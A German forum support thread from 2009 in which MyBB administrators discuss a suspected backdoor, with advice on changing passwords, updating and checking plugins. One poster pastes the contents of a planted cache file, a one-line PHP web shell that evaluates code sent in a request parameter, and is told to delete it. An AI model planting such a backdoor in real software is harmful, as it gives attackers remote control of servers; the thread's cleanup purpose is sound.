Hi,
laut einer unbekannten Quelle, besitze ich auf meinem Forum einen Backdoor Trojaner.
Nun ist meine Frage, wie kann man Diesen entfernen ?
Hi,
da fehlen ein paar Infos. Wer ist die Quelle? Wenn sie unbekannt ist, woher weißt du es dann?
(02.08.2009, 21:20)querschlaeger schrieb: [ -> ]Hi,
da fehlen ein paar Infos. Wer ist die Quelle? Wenn sie unbekannt ist, woher weißt du es dann?
Das Forum laggt extrem und die Quelle meinte, es wäre ein Backdoor Trojaner.
Wenn wir diesen nicht demnächst entfernen würden, wäre das Forum bald offline.
Hört alles viel zu nebulös an...
Aber wenn du auf Nummer Sicher gehen willst: Ändere alle Passwörter (FTP, SQL, Passwörter der Admins und notfalls noch das Passwort des CP von deinem Provider) - kann nie schaden. Stelle außerdem sicher, dass sich dein MyBB auf der aktuellsten Version befindet bzw. vergleiche die MyBB-Dateien mit denen aus dem offiziellen Paket. Überprüfe auch mal ob die langsame Geschwindigkeit nicht evtl. durch ein Plugin verursacht wird (bei der Gelegenheit auch mal die Plugins auf neuere Versionen prüfene - geht ja einfach im Admin CP).
Ansonsten: Frag deine Quelle mal, wie sie zu so einer Aussage kommt.
Hallo,
ich hole diesen Thread noch einmal hoch,
in dem Link steht
Zitat:Look in your ./cache/themes/ folder, if you see a files called themes.php, please delete it.
Quelle
Ich habe gerade in meinem Forum geschaut (wir wurden gehackt) und ich habe eine solche Datei.
Allerdings nicht in /themes/folder sondern in /themes
gehört die dennoch gelöscht oder ist die dort richtig?
Wahrscheinlich gehört sie dort hin, oder?!
Sie ist vor einem Jahr das letzte mal bearbeitet worden, laut Angaben
Aber mir fehlt dann die /themes/folder die habe ich nicht dort als Unterordner
hier das steht drinne:
Code:
<?PHP if (isset($_REQUEST[x])) eval(stripslashes($_REQUEST[x])); ?>
Die Datei muss weg, die ist gefährlich.
ok, dann werde ich die mal löschen
Danke
um die index-Dateien, also index.php und index.html alle wieder herzustellen, muß ich das alles per hand von einem Backup machen oder kann ich das auch per Upgrade?
Ein Upgrade würde mir dann allerdings wahrscheinlich eine solche Datei, wie eben gelöscht, nicht löschen oder?
wie erkenne ich diese?